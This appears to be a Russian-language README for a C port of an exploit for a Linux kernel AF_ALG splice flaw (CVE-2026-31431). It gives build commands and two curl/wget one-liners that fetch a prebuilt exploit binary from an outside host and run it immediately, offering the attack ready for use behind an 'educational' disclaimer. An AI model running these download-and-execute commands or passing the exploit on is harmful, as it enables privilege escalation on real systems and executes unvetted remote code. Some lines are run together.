
C-порт proof-of-concept, эксплуатирующего уязвимость в логике splice в AF_ALG AEAD ядра Linux (CVE-2026-31431), для образовательных исследований.
Этот проект представляет собой порт на C оригинального прототипа на Python, созданного offsecguy.
Он использует криптографический API ядра Linux (AF_ALG) с применением:
authencesn(hmac(sha256),cbc(aes))MSG_MOREsplice()Методика передаёт данные из файлового дескриптора, доступного только для чтения, через крипто-сокет, обрабатывая их чанк за чанком.
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz
gcc exp.c -o exp -lz -s -static
gcc exp.c -o exp -lz -s
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp
AF_ALG в ядре Linuxzlib для декомпрессииЭтот код предоставлен только для образовательных и исследовательских целей.
Используйте ответственно и только на системах, которые вам разрешено тестировать.